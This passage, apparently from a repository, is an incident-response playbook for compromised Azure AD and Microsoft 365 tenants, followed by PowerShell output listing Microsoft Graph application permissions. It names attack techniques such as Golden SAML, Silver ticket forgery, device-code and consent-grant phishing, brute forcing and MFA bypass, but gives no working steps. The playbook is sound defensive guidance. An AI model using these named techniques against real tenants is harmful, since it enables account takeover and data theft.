220 |      -   **Suspicious logins**, for example for anomalous logins by country, impossible travel logins and logins from cloud services VPNs/VPSs/Azure/AWS/GCP (Note attackers have been seen using [residential IP proxy services or newly provisioned geo located infrastructure](https://www.mandiant.com/resources/russian-targeting-gov-business), to evade MFA and obfuscate logging (e.g. a geographically co-located azure instance))
221 |      -   **Password spraying, credential stuffing, brute forcing attacks targeting privileged accounts**, also repeated multi-factor authentication challenges being denied by the user / failing ([Attackers have been seen abusing multi-factor authentication by leveraging “push” notifications on smartphones](https://www.mandiant.com/resources/russian-targeting-gov-business)).
222 |      -   **Multi-factor authentication requests to a user repeatedly being denied or failing.**
223 |      -   **The use of legacy protocols** to login to privileged accounts (Attackers bypass requirements for multi-factor authentication by authentication with legacy protocols)
224 |      -   **Anomalous logins from on-premises infrastructure** (used by attackers to bypass Conditional Access rules and requirements for multi-factor authentication)
225 | 
226 | -   **Review Azure AD Audit logs to identify:**
227 |      -   **Fake devices being associated to privileged accounts**
228 |      -   **Privileged accounts being created**
229 |      -   **Accounts being added to privileged roles**
230 |      -   **Other suspicious events related to privileged accounts, for example passwords being reset, and re-enrolling accounts for MFA**
231 | 
232 | -   **Review risk events and detections associated with privileged account logins**
233 | 
234 | ### Hunt for hijacked Azure AD Applications and Service Principals 
235 | 
236 | -   **Identify Applications and Service Principal with sensitive "Application" Microsoft Graph API permissions configured, and other sensitive application specific API permissions**, including AppRoleAssignment.ReadWrite.All, RoleManagement.ReadWrite.Directory, and Mail.Read. 
237 | 
238 | -  **Identify Service Principals with both credentials and sensitive permissions** to identify the malicious addition of credentials to new or existing Service Principals including "first party" Microsoft / built-in by default Service Principals ([T1098.001](https://attack.mitre.org/techniques/T1098/001/)) (AzureAD: Get-AzureADServicePrincipal -All $True) 
239 | 
240 | -  **Identify Applications with credentials and sensitive permissions** to identify the malicious addition of credentials to new or existing Applications ([T1098.001](https://attack.mitre.org/techniques/T1098/001/)) (AzureAD: Get-AzureADApplication -All $True)
241 | 
242 | -   **Review all Azure AD logs for suspicious sign-ins by Service Principals with sensitive permissions** to identify compromised services principals (including considering whether **third-party Service Principal credentials** have been compromised) 
243 | 
244 | -   **Review Azure AD Audit logs** to identify the malicous creation of Service Principals and Applications, the addition of credentials to Service Principals and Applications, and sensitive permissions being added to Applications or Service Principals.
245 | 
246 | ### Hunt for malicious modifications to mailboxes and the Exchange Online configuration 
247 | 
248 | -   **Review mailbox folder permissions to identify malicious changes to mailbox permissions**, for example adding permissions to Default or Anonymous users ([T1098.002](https://attack.mitre.org/techniques/T1098/002/)) 
249 | 
250 | -   **Review mailbox and inbox rules for mailboxes to identify malicious rules being created**
251 | 
252 | -   **Review transport rules to identify malicious rules being added**
253 | 
254 | -   **Review client access settings configured on mailboxes to identify malicious changes**
255 | 
256 | -   **Review audit logs configured on mailboxes** to identify what logging should be expected and whether the attacker has likely made any malicous changes. 
257 | 
258 | -   **Review accounts with application impersonation permissions** to identify whether the attacker has added this permissions to any accounts. 
259 | 
260 | -   **Review UAL logs for suspicious changes** for example permissions being changed on mailboxes or the addition of Application impersonation role to accounts.
261 | 
262 | -   **Review UAL logs for suspicous activity** including service principals accessing mailboxes (requries MailItemsAccessed), eDiscovery searches and PowerShell being used to access mailboxes. 
263 | 
264 | ### Hunt for illicit application consent attacks 
265 | 
266 | -  **Review AAD application consent grants and AAD application delegate permissions** to identify [illicit application consent attacks](https://docs.microsoft.com/en-us/security/compass/incident-response-playbook-app-consent) that allow attackers access to emails, data or to perform sensitive operations.
267 | 
268 | ### Hunt for the compromise of on-premises systems and accounts 
269 | 
270 | -   **Deploy Endpoint Detection and Response tooling to on-premises and Azure servers** to allow the response team to hunt for and investigate attacker activity, and configure detection rules for known attacker indicators of compromise.
271 | 
272 | -   **Sweep on-premises systems and logs for identified indicators of compromise**
273 | 
274 | -   **Review on-premises security alerts** for any alerts that could indicated the compromise of the on-premises environment.  
275 | 
276 | -   **Review process and network activity from (tier-0 Domain Controllers, ADFS or AD Connect servers) systems for evidence known techniques used to move between cloud and on-premises environments**, including the attacker: 
277 |      -   Stealing or modify token-signing certificates on ADFS servers to perform a Golden SAML attack
278 |      -   Backdooring Pass-Through Authentication to compromise cloud accounts.
279 |      -   Compromising the AZUREADSSOACC account to forge Kerberos tickets (Silver ticket attack)
280 |      -   Compromising the Azure AD Connect accounts to set password for accounts in privileged cloud groups
281 |      -   Dumping credentials to accounts in privileged cloud groups by compromising workstations, servers and domain controllers
282 |      -   Compromising stored service principal credentials from on-premise systems, and use these to authenticate to Azure AD
283 | 	   -   Compromise secrets from multi-factor authentication management server and use this to bypass MFA
284 | 	   -   Stopping Sysmon and Splunk logging on devices and clearing Windows Event Logs (see ref [here](https://www.mandiant.com/resources/russian-targeting-gov-business))
285 | 
286 | -   **Perform an at-scale audit of auto-runs for all on-premises systems**
287 | 
288 | -   **Review the use of Intune and Microsoft Endpoint Manager to manage systems**, including those used by privileged users 
289 | 
290 | -   **Review Azure AD signin logs for suspicious logons from AD Connect accounts**
291 | 
292 | ### Hunt for the compromise of and malicious changes to Azure resources 
293 | 
294 | -   **Review Azure Activity logs to identify any malicious changes to permissions on Azure resources** for example adding new owners to subscriptions or resource groups, or changing permissions on storage buckets.
295 | 
296 | -   **Review Azure Activity logs to identify whether the attacker used their access to compromise Azure services**, including by using the [Azure Run command](https://docs.microsoft.com/en-us/azure/virtual-machines/windows/run-command) to execute commands on VMs, downloading of virtual machine images, creating SAS URLs, or listing storage accounts keys.
297 | 
298 | -   **Review process and network activity from Azure servers**, for example to identify the attacker compromising VM with managed identities configured
299 | 
300 | ## Monitor for further attacker activity and prepare to rapidly respond 
301 | 
302 | -   **Onboard Azure AD, Microsoft 365 and Azure Activity logs to Microsoft Sentinel**
303 | 
304 | -   **Configure and tune detection rules** for the configuration of persistence mechanism (e.g. addition of credentials to service principals and modifications to federation settings) and common attacker techniques (e.g. using Azure Run commands) (see Microsoft Sentinel Github rules [Azure AD Audit log detection rules](https://github.com/Azure/Azure-Sentinel/tree/8768b916756b827da02d1dfd95ece8fbe27049c4/Detections/AuditLogs), [Azure Activity detection rules](https://github.com/Azure/Azure-Sentinel/tree/8768b916756b827da02d1dfd95ece8fbe27049c4/Detections/AzureActivity), and [Azure AD Sign-in detection rules](https://github.com/Azure/Azure-Sentinel/tree/8768b916756b827da02d1dfd95ece8fbe27049c4/Detections/SigninLogs), [Office 365 (UAL) detection rules](https://github.com/Azure/Azure-Sentinel/tree/8768b916756b827da02d1dfd95ece8fbe27049c4/Detections/OfficeActivity))
305 | 
306 | -   **Configure Microsoft Sentinel detection rules for indicators of compromise identified in the incident**
307 | 
308 | -   **Configure Microsoft Sentinel Automation rules and Playbooks** to alert on incidents being created. 
309 | 
310 | -   **Configure** [**Microsoft 365 Advanced Auditing features**](https://docs.microsoft.com/en-us/microsoft-365/compliance/mailitemsaccessed-forensics-investigations) **and ensure logs are feeding through into Azure Sentinel**
311 | 
312 | -   **Stand up 24/7 monitoring and response capability to monitor for security alerts, risk events and access to privileged accounts**
313 | 
314 | -   **Deploy cloud-based threat protection tooling, including** [Microsoft Defender for Identity](https://docs.microsoft.com/en-us/defender-for-identity/what-is) and Microsoft Defender for Cloud Apps.
315 | 
316 | -   **Perform threat hunting based on the tools and techniques used in the incident** to ensure all further activity has been identified, including by enabling the [Microsoft Solarwinds hunting workbook](https://techcommunity.microsoft.com/t5/microsoft-sentinel-blog/solarwinds-post-compromise-hunting-with-azure-sentinel/ba-p/1995095)
317 | 
318 | ## Regain administrative control and remove all attacker access
319 | 
320 | ### Prepare 
321 | 
322 | -   **Methodically plan how to remove all attacker access and persistence** identified during the investigation, and how to perform all remediation tasks whilst managing business impact.
323 | 
324 | -   **Block known indicators of compromise known to be used by the threat actor**, including by blocking IP addresses, sinkholing domains and blocking malware from executing.
325 | 
326 | -   **Temporarily break trust with on-premises Active Directory domains,** and switch to using cloud-mastered identity while remediating the on-premise environment.
327 | 
328 | ### Azure AD 
329 | 
330 | -   **Remove persistence methods and malicious configuration changes** and validate that this has been successfully performed.
331 | 
332 | -   **Remediate the initial access method used by the attacker**, for example by setting strong passwords,  enabling MFA on compromised accounts, disabling compromised accounts and removing delegated administrator permissions.
333 | 
334 | -   **Remove accounts from privileged Azure AD roles** unless strictly required.
335 | 
336 | -   **Ensure all privileged accounts have multi-factor authentication enforced (using verification codes or hardware tokens) and are not configured to sync with on-premises Active Directory domains.**
337 | 
338 | -   **Remove sensitive permissions from Service Principals** unless strictly required in order for the AAD applications to function.
339 | 
340 | -   **Create break glass Global Aministrator accounts and ensure that these are excluded from all Conditional Access policies**
341 | 
342 | -   **Reset passwords for known compromised accounts, revoke the account's Azure AD refresh tokens and disable registered devices** ([see this Microsoft article](https://docs.microsoft.com/en-us/azure/active-directory/enterprise-users/users-revoke-access) on the different types of authentication tokens and how to revoke all access for a user)
343 | 
344 | -   **Reset passwords of all privileged Azure AD accounts, revoke refresh tokens and audit registered devices**
345 | 
346 | -   **Rotate credential material for any Service Principals that are members of privileged roles and revoke refresh tokens**
347 | 
348 | -   **Block legacy authentication methods and review conditional access policies that are configured**
349 | 
350 | -   **Assess what authentication material the attacker may have been able to access** with the accounts they were able to compromise, and whether there was sufficient logging to confirm this (e.g. Access keys for Azure Storage accounts) and take steps to mitigate this risk.
351 | 
352 | -   **Assess what other authentication material the attacker would have been able to generate / steal** with the accounts they were able to compromise, and whether there was sufficient logging to confirm this (e.g. creating shared access signatures for Azure Storage accounts) and take steps to mitigate this risk.
353 | 
354 | ### Active Directory 
355 | 
356 | -   **Remove domain administrator privileges from all on-premises user accounts and service accounts**, apart from those used by the remediation team and for break glass accounts.
357 | 
358 | -   **Identify, review and harden access to all on-premises Tier 0 systems**
359 | 
360 | -   **Remediate accounts in the on-premises environment**, including:  
361 |     - Disable or reset the password of all known compromised accounts twice 
362 |     - Resetting all privileged accounts  
363 |     - Resetting the AZUREADSSOACC account  
364 |     - Resetting the on-premises AD DS connector account  
365 |     - Resetting the Azure AD connector account  
366 |     - Resetting the on-premises ADSync Service Account  
367 |     - Resetting the local accounts on DCs  
368 |     - Rotating the token-signing certificate twice  
369 |     - Resetting the Kerberos ticket granting ticket account twice  
370 |     - Rotating secrets associated with remote access MFA token generation
371 | 
372 | -   **Rebuild all compromised systems**
373 | 
374 | -   **Reset VMware ESXi root account passwords**
375 | 
376 | -   **Restart all systems** to mitigate the risk of in-memory malware still running, for example Cobalt Strike.
377 | 
378 | -   **Re-establish federation trusts between on-premises Active Directory domains and Azure AD tenant**
379 | 
380 | ## Assess data accessed and or exfiltrated by the attacker 
381 | 
382 | -   **Assess the business impact of incident** by investigating what data was accessed by the attacker.
383 | 
384 | ## Improve security posture to defend against further attacks
385 | 
386 | -   **Remove delegated administrator permissions** from partner relationships, and migrate to [granular delegated admin privileges (GDAP)](https://docs.microsoft.com/en-us/partner-center/gdap-introduction) if access is still required.
387 | 
388 | -   **Add Azure AD P2 licenses for administrator accounts, configure Privileged Identity Manager (PIM) and remove all accounts from the Global Admin role** (except break glass accounts), set eligible assignments to accounts for Azure AD roles that can be activated for time limited periods. 
389 | 
390 | -   **Deploy Azure AD Password Protection** to detect and block known weak passwords.
391 | 
392 | -   **Perform an enterprise-wide passwords reset**, including resetting all service accounts and configuring employee accounts to change password at next logon.
393 | 
394 | -   **Configure [number matching for multifactor authentication](https://docs.microsoft.com/en-us/azure/active-directory/authentication/how-to-mfa-number-match) push notifications** 
395 | 
396 | -   **Roll-out, configure and enforce multi-factor authentication for all user accounts** using conditional access policies.
397 | 
398 | -   **Ensure that multi-factor authentication is configured and enforced for other externally accessible applications**, for example remote access portals and VPNs.
399 | 
400 | -   **Identify and remediate cyber security posture weaknesses that allowed the attacker to occur** by mapping techniques used by the attacker against the MITRE ATT&CK Framework and triaging targeted improvements.
401 | 
402 | -   **Implement sustainably secure cloud and on-premises administration practices** based on Microsoft’s [enterprise access model](https://docs.microsoft.com/en-us/security/compass/privileged-access-access-model).
403 | 
404 | -   **Restrict the use of on-premises domain administrator accounts** to prevent credentials for these accounts being unnecessarily exposed on systems increasing the risk of compromise. Restrict accounts in the domain admins group from [logging into workstations and servers](https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-f--securing-domain-admins-groups-in-active-directory), to start to implementing a [three-tiered administration model](https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access).
405 | 
406 | -   **Implement** [**Azure AD**](https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/active-directory-deployment-checklist-p2) **and** [**Microsoft 365**](https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/security-roadmap?view=o365-worldwide) **good practice security guidance**, as well as Microsoft's guidance on [protecting Microsoft 365 from on-premises attacks](https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/protect-m365-from-on-premises-attacks).
407 | 
408 | -   **Identify any Application or Service Principals using passwords as credentials and migrate these to using more secure forms of authentication whenever possible** (certificate, managed identities, or Windows Integrated Authentication or certificate).
409 | 
410 | -   **Remove sensitive delegated permissions from applications, remove unnecessary grants**, and prevent users from being able to consent to unknown applications.
411 | 
412 | -   **Ensure conditional access policies limit access** to hybrid azure ad joined or compliant devices (prevent the use of organisation accounts on unmanaged and personal devices, where authentication tokens can be stolen by malware).
413 | 
414 | -   **Ensure all logs in [Key logs to identify and preserve in the initial stages of a response](#key-logs-to-identify-and-preserve-in-the-initial-stages-of-a-response) are onboarded to the SIEM**
415 | 
416 | -   **Enhance detection and response capability by deploying and tuning further detection rules**, for to detect the compromise and abuse of privileged accounts, persistence techniques, and for rare global events (also centrally collect and retain logs).
417 | 
418 | -   **Ensure that Azure AD Identity Protection is configured with policies for high risk users and sign-ins**, along with Azure AD Self-Service Password Reset (SSPR) for all users.
419 | 
420 | -   **Configure [Conditional Access rules to restrict logons for Service Principals](https://docs.microsoft.com/en-us/azure/active-directory/conditional-access/workload-identity) with sensitive permissions** to restict signins to Service Principals to an allow list of IP addresses. 
421 | 
422 | -   **Review Microsoft Secure Secure, triage and implement remediation recommendations**
423 | 
424 | -   **Assign responsibility for regally auditing Azure AD and Microsoft 365 configuration**, including Applications and Service Principals, federation trust settings, Conditional Access policies, trust relationships and Microsoft Secure Score recommendations
425 | 
426 | -   **Configure** [**Privileged Access Management**](https://techcommunity.microsoft.com/t5/microsoft-security-and/privileged-access-management-in-office-365-is-now-generally/ba-p/261751) **in Microsoft 365**
427 | 
428 | -   **Limit application consent policy to administrators**
429 | 
430 | -   **Block email forwarding to remote domains**
431 | 
432 | -   **Configure enhanced mailbox audit logging**, including MailItemsAccessed.
433 | 
434 | -   **Reduce the risk of phishing attacks,** including by deploying email tooling that restricts attachment file-types and scans for malicious content, and by deploying always-on web security tooling that blocks malicious content and website categories.
435 | 
436 | -   **Harden workstations used by employees**, including by hardening endpoints to restrict the execution of untrusted scripts and executables (including with EPP tooling, [WDAC and AppLocker](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/wdac-and-applocker-overview) and by blocking [executables commonly used to circumvent these](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)), configuring [Attack Surface Reduction rules](https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction?view=o365-worldwide), and removing local administrator privileges from standard accounts and restricting the execution of untrusted Microsoft Office macros.
437 | 
438 | -   **Improve the security of the on-premises environment**, including by restricting internet access for all servers to an allow list, proactive hunting for Active Directory hygiene issues (including by running [PingCastle](https://www.pingcastle.com/),  [Bloodhound](https://github.com/BloodHoundAD/BloodHound) and [Trimarc ADChecks](https://www.hub.trimarcsecurity.com/post/securing-active-directory-performing-an-active-directory-security-review)), and performing regular internal vulnerability scanning.
439 | 
440 | -   **Use security testing to validate improvements made**, including by using ‘red teaming’ to validate detection and response capabilities.
441 | 
442 | ## Key logs to identify and preserve in the initial stages of a response
443 | 
444 | ### Azure AD and Microsoft 365 logs
445 | 
446 | -   Microsoft Office 365 Unified Audit Logs (single exports limited to 50,000) (not configured by default) (if not already onboarded to Sentinel retained for 90 days E3 and 1 year for E5)
447 | 
448 | -   Azure AD logs (if not already onboarded to Azure Sentinel [retained for 30 days with Azure AD Premium P1/P2](https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-reports-data-retention)), note there are several types of logs:  
449 |     - Audit log  
450 |     - Sign-in logs  
451 |     - NonInteractiveUserSignInLogs  
452 |     - ServicePrincipalSignInLogs  
453 |     - ManagedIdentitySignInLogs  
454 |     - ProvisioningLogs  
455 |     - ADFSSignInLogs  
456 |     - RiskyUsers  
457 |     - UserRiskEvents
458 | -   Azure Activity logs ([retained for 90 days](https://docs.microsoft.com/en-us/azure/azure-monitor/essentials/activity-log))
459 | 
460 | -   Microsoft Endpoint Manager Audit Logs
461 | 
462 | -   Azure Key Vault logging
463 | 
464 | -   Azure Identity Protection Risky sign-ins and detections
465 | 
466 | 
467 | If **Azure AD logs are not already being ingested into a SIEM, there are a two options available for exporting them:**
468 | 
469 | -   Exporting via the Unified Audit Logs (UAL). Azure AD logs in the UAL are not stored in the same structure as those in Azure Sentinel. Logs from the UAL can be exported and then manually imported into Azure Data Explorer for analysis. Queries that can be used to search through the UAL logs in Azure Data Explorer are well documented [here](https://m365internals.com/2021/07/13/what-ive-learned-from-doing-a-year-of-cloud-forensics-in-azure-ad/).
470 | 
471 | -   Exporting via the Azure AD Console. Azure AD logs exported using this method are not stored in the same structure as those in Azure Sentinel. Logs can be exported in CSV and JSON with up to 100,000 records per export. 
472 | 
473 | -   Exporting via PowerShell. Azure AD logs can be exported via PowerShell using the AzureADPreview (_Get-AzureADAuditDirectoryLogs_ and _Get-AzureADAuditSignInLogs_). These can then be converted into JSON and imported into Azure Data Explorer for analysis. These logs will be in the same structure as the logs are present in Azure Sentinel. As a result well documented Sentinel KQL [detection queries](https://github.com/Azure/Azure-Sentinel/tree/master/Detections/AuditLogs) can be run against these with minimal modifications.
474 | 
475 | **Logs from on-premises systems**
476 | 
477 | -   Security Event Logs from Tier 0 systems (including domain controllers, ADFS and AD connect servers)
478 | 
479 | -   Antivirus logs from management console
480 | 
481 | -   VPN logs
482 | 
483 | -   Exchange logs
484 | 
485 | -   vCenter logs
486 | 
487 | -   Security logs from multi-factor authentication management server
488 | 
489 | -   Privilege Access Management logs
490 | 
491 | ### **Other logs**
492 | 
493 | -   Authentication logs from SaaS applications
494 | 
495 | 
496 | ## Initial access techniques for gaining access to Microsoft 365 and Azure AD
497 | 
498 | **Phishing and deploying malware to gain valid credentials**
499 | 
500 | -   Send phishing emails that deploy credential-stealing malware (username / passwords combinations, session tokens, primary refresh token)
501 | 
502 | -   Send phishing emails that use fake websites to compromise user’s username and passwords combinations (T1566.002)
503 | 
504 | -   Gain credentials (username and passwords combinations, or session tokens) from third-parties that deploy credential-stealing malware
505 | 
506 | -   Pass the Cert
507 | 
508 | **Phishing to gain access to accounts**
509 | 
510 | -   Send phishing emails that use the device-code phishing attack
511 | 
512 | -   Send phishing emails that use the consent grant attack to register malicious applications to access user data
513 | 
514 | **Brute forcing accounts to gain valid credentials**
515 | 
516 | -   Brute forcing credentials via legacy protocols (OWA / EWS)
517 | 
518 | -   Bruteforce via Azure AD Sign-in page
519 | 
520 | -   Bruteforce via Autologon API
521 | 
522 | **Compromising cloud-service providers (CSP) to gain access to tenants**
523 | 
524 | -   Compromise an account within a CSP’s tenant with Delegated Admin Privileges privileges to gain access to victim tenant (T1078.004)
525 | 
526 | -   Compromise an account within a CSP’s tenant with Admin on Behalf Of (AOBO) permissions to gain access to victim tenant (T1078.004)
527 | 
528 | **Compromising on-premises network to gain access to tenants**
529 | 
530 | -   Stealing or modify token-signing certificates to perform a Golden SAML attack
531 | 
532 | -   Compromise the AZUREADSSOACC account to forge Kerberos tickets (Silver ticket attack)
533 | 
534 | -   Compromise the Azure AD Connect accounts to set password for accounts in privileged cloud groups
535 | 
536 | -   Crack and dump clear text credentials to accounts in privileged cloud groups by compromising workstations, servers and domain controllers
537 | 
538 | -   Compromise stored service principal credentials from on-premise systems, and use these to authenticate to Azure AD
539 | 
540 | -   Backdoor the Pass-Through Authentication process to compromise cloud accounts
541 | 
542 | -   Compromise secrets from multi-factor authentication management server and use this to bypass MFA
543 | 
544 | **Compromising third-parties**
545 | 
546 | -   Compromise stored service principal credentials from on-premise systems, and use these to authenticate to Azure AD
547 | 
548 | -   Compromise secrets from multi-factor authentication management server and use this to bypass MFA
549 | 


--------------------------------------------------------------------------------
/GraphAppPermissions.txt:
--------------------------------------------------------------------------------
   1 | PS> ($gps = Get-AzureADServicePrincipal -All $true | Where-Object {$_.DisplayName -eq "Microsoft Graph"}).AppRoles
   2 | 
   3 | AllowedMemberTypes : {Application}
   4 | Description        : Allow the application to access a subset of site collections without a signed in user.The specific site collections and the 
   5 |                      permissions granted will be configured in SharePoint Online.
   6 | DisplayName        : Access selected site collections (preview)
   7 | Id                 : 883ea226-0bf2-4a8f-9f9d-92c9162a727d
   8 | IsEnabled          : True
   9 | Value              : Sites.Selected
  10 | 
  11 | AllowedMemberTypes : {Application}
  12 | Description        : Allows the application to read tenant-wide print settings without a signed-in user.
  13 | DisplayName        : Read tenant-wide print settings
  14 | Id                 : b5991872-94cf-4652-9765-29535087c6d8
  15 | IsEnabled          : True
  16 | Value              : PrintSettings.Read.All
  17 | 
  18 | AllowedMemberTypes : {Application}
  19 | Description        : Allows the app to create chats without a signed-in user. 
  20 | DisplayName        : Create chats
  21 | Id                 : d9c48af6-9ad9-47ad-82c3-63757137b9af
  22 | IsEnabled          : True
  23 | Value              : Chat.Create
  24 | 
  25 | AllowedMemberTypes : {Application}
  26 | Description        : Add and remove members from all chats, without a signed-in user.
  27 | DisplayName        : Add and remove members from all chats
  28 | Id                 : 57257249-34ce-4810-a8a2-a03adf0c5693
  29 | IsEnabled          : True
  30 | Value              : ChatMember.ReadWrite.All
  31 | 
  32 | AllowedMemberTypes : {Application}
  33 | Description        : Read the members of all chats, without a signed-in user.
  34 | DisplayName        : Read the members of all chats
  35 | Id                 : a3410be2-8e48-4f32-8454-c29a7465209d
  36 | IsEnabled          : True
  37 | Value              : ChatMember.Read.All
  38 | 
  39 | AllowedMemberTypes : {Application}
  40 | Description        : Allow the app to evaluate the inputs provided against the Data Loss Prevention policies and recommend applicable actions, without 
  41 |                      a signed-in user.
  42 | DisplayName        : Evaluate Data Loss Prevention policy
  43 | Id                 : ba7b8302-40ad-475c-a768-5b990aa1dba1
  44 | IsEnabled          : True
  45 | Value              : DataLossPreventionPolicy.Evaluate
  46 | 
  47 | AllowedMemberTypes : {Application}
  48 | Description        : Allow the app to determine if there is any sensitivity label to be applied automatically to the content or recommended to the 
  49 |                      user for manual application, without a signed-in user.
  50 | DisplayName        : Evaluate sensitivity labels
  51 | Id                 : 57f0b71b-a759-45a0-9a0f-cc099fbd9a44
  52 | IsEnabled          : True
  53 | Value              : SensitivityLabel.Evaluate
  54 | 
  55 | AllowedMemberTypes : {Application}
  56 | Description        : Allow the app to scan the text in the input to detect the sensitive information types, without a signed-in user.
  57 | DisplayName        : Detect sensitive information types
  58 | Id                 : 673cd294-c6eb-43f7-8bc9-cee7da70d759
  59 | IsEnabled          : True
  60 | Value              : SensitiveInfoType.Detect
  61 | 
  62 | AllowedMemberTypes : {Application}
  63 | Description        : Allow the app to get the list of available sensitive types, including out of box and custom configured, without a signed-in user.
  64 | DisplayName        : Read available sensitive information types
  65 | Id                 : 107747da-618e-4e26-bcaf-6adac31d8dae
  66 | IsEnabled          : True
  67 | Value              : SensitiveInfoType.Read.All
  68 | 
  69 | AllowedMemberTypes : {Application}
  70 | Description        : Allows the app to read, create and manage the API connectors used in user authentication flows, without a signed-in user.
  71 | DisplayName        : Read and write API connectors for authentication flows
  72 | Id                 : 1dfe531a-24a6-4f1b-80f4-7a0dc5a0a171
  73 | IsEnabled          : True
  74 | Value              : APIConnectors.ReadWrite.All
  75 | 
  76 | AllowedMemberTypes : {Application}
  77 | Description        : Allows the app to read the API connectors used in user authentication flows, without a signed-in user.
  78 | DisplayName        : Read API connectors for authentication flows
  79 | Id                 : b86848a7-d5b1-41eb-a9b4-54a4e6306e97
  80 | IsEnabled          : True
  81 | Value              : APIConnectors.Read.All
  82 | 
  83 | AllowedMemberTypes : {Application}
  84 | Description        : Allows a Teams app to read, install, upgrade, and uninstall all tabs for any user, without a signed-in user.
  85 | DisplayName        : Allow the app to manage all tabs for all users
  86 | Id                 : 425b4b59-d5af-45c8-832f-bb0b7402348a
  87 | IsEnabled          : True
  88 | Value              : TeamsTab.ReadWriteForUser.All
  89 | 
  90 | AllowedMemberTypes : {Application}
  91 | Description        : Allows a Teams app to read, install, upgrade, and uninstall all tabs in any team, without a signed-in user.
  92 | DisplayName        : Allow the Teams app to manage all tabs for all teams
  93 | Id                 : 6163d4f4-fbf8-43da-a7b4-060fe85ed148
  94 | IsEnabled          : True
  95 | Value              : TeamsTab.ReadWriteForTeam.All
  96 | 
  97 | AllowedMemberTypes : {Application}
  98 | Description        : Allows a Teams app to read, install, upgrade, and uninstall all tabs for any chat, without a signed-in user.
  99 | DisplayName        : Allow the Teams app to manage all tabs for all chats
 100 | Id                 : fd9ce730-a250-40dc-bd44-8dc8d20f39ea
 101 | IsEnabled          : True
 102 | Value              : TeamsTab.ReadWriteForChat.All
 103 | 
 104 | AllowedMemberTypes : {Application}
 105 | Description        : Allows the app to read all one-to-one and group chats messages in Microsoft Teams, without a signed-in user.
 106 | DisplayName        : Read all chat messages
 107 | Id                 : b9bb2381-47a4-46cd-aafb-00cb12f68504
 108 | IsEnabled          : True
 109 | Value              : ChatMessage.Read.All
 110 | 
 111 | AllowedMemberTypes : {Application}
 112 | Description        : Allows the app to read all PSTN and direct routing call log data without a signed-in user.
 113 | DisplayName        : Read PSTN and direct routing call log data
 114 | Id                 : a2611786-80b3-417e-adaa-707d4261a5f0
 115 | IsEnabled          : True
 116 | Value              : CallRecord-PstnCalls.Read.All
 117 | 
 118 | AllowedMemberTypes : {Application}
 119 | Description        : Allows the app to read role-based access control (RBAC) settings for all RBAC providers without a signed-in user. This includes 
 120 |                      reading role definitions and role assignments.
 121 | DisplayName        : Read role management data for all RBAC providers
 122 | Id                 : c7fbd983-d9aa-4fa7-84b8-17382c103bc4
 123 | IsEnabled          : True
 124 | Value              : RoleManagement.Read.All
 125 | 
 126 | AllowedMemberTypes : {Application}
 127 | Description        : Allows the app to read your organization's conditional access policies, without a signed-in user.
 128 | DisplayName        : Read your organization's conditional access policies
 129 | Id                 : 37730810-e9ba-4e46-b07e-8ca78d182097
 130 | IsEnabled          : True
 131 | Value              : Policy.Read.ConditionalAccess
 132 | 
 133 | AllowedMemberTypes : {Application}
 134 | Description        : Allows the app to read, create, edit, and delete all the short notes without a signed-in user.
 135 | DisplayName        : Read, create, edit, and delete all users' short notes
 136 | Id                 : 842c284c-763d-4a97-838d-79787d129bab
 137 | IsEnabled          : True
 138 | Value              : ShortNotes.ReadWrite.All
 139 | 
 140 | AllowedMemberTypes : {Application}
 141 | Description        : Allows the app to read all the short notes without a signed-in user.
 142 | DisplayName        : Read all users' short notes
 143 | Id                 : 0c7d31ec-31ca-4f58-b6ec-9950b6b0de69
 144 | IsEnabled          : True
 145 | Value              : ShortNotes.Read.All
 146 | 
 147 | AllowedMemberTypes : {Application}
 148 | Description        : Allows the app to read your tenant's service announcement messages, without a signed-in user. Messages may include information 
 149 |                      about new or changed features.
 150 | DisplayName        : Read service messages
 151 | Id                 : 1b620472-6534-4fe6-9df2-4680e8aa28ec
 152 | IsEnabled          : True
 153 | Value              : ServiceMessage.Read.All
 154 | 
 155 | AllowedMemberTypes : {Application}
 156 | Description        : Allows the app to read your tenant's service health information, without a signed-in user. Health information may include service 
 157 |                      issues or service health overviews.
 158 | DisplayName        : Read service health
 159 | Id                 : 79c261e0-fe76-4144-aad5-bdc68fbe4037
 160 | IsEnabled          : True
 161 | Value              : ServiceHealth.Read.All
 162 | 
 163 | AllowedMemberTypes : {Application}
 164 | Description        : Allows the app to read, edit or write all term store data, without a signed-in user. This includes all sets, groups and terms in 
 165 |                      the term store.
 166 | DisplayName        : Read and write all term store data
 167 | Id                 : f12eb8d6-28e3-46e6-b2c0-b7e4dc69fc95
 168 | IsEnabled          : True
 169 | Value              : TermStore.ReadWrite.All
 170 | 
 171 | AllowedMemberTypes : {Application}
 172 | Description        : Allows the app to read all term store data, without a signed-in user. This includes all sets, groups and terms in the term store.
 173 | DisplayName        : Read all term store data
 174 | Id                 : ea047cc2-df29-4f3e-83a3-205de61501ca
 175 | IsEnabled          : True
 176 | Value              : TermStore.Read.All
 177 | 
 178 | AllowedMemberTypes : {Application}
 179 | Description        : Add and remove members from all teams, without a signed-in user. Does not allow adding or removing a member with the owner role. 
 180 |                      Additionally, does not allow the app to elevate an existing member to the owner role.
 181 | DisplayName        : Add and remove members with non-owner role for all teams
 182 | Id                 : 4437522e-9a86-4a41-a7da-e380edd4a97d
 183 | IsEnabled          : True
 184 | Value              : TeamMember.ReadWriteNonOwnerRole.All
 185 | 
 186 | AllowedMemberTypes : {Application}
 187 | Description        : Allows the app to create teams without a signed-in user. 
 188 | DisplayName        : Create teams
 189 | Id                 : 23fc2474-f741-46ce-8465-674744c5c361
 190 | IsEnabled          : True
 191 | Value              : Team.Create
 192 | 
 193 | AllowedMemberTypes : {Application}
 194 | Description        : Allows a Teams app to read, install, upgrade, and uninstall itself to any user, without a signed-in user.
 195 | DisplayName        : Allow the app to manage itself for all users
 196 | Id                 : 908de74d-f8b2-4d6b-a9ed-2a17b3b78179
 197 | IsEnabled          : True
 198 | Value              : TeamsAppInstallation.ReadWriteSelfForUser.All
 199 | 
 200 | AllowedMemberTypes : {Application}
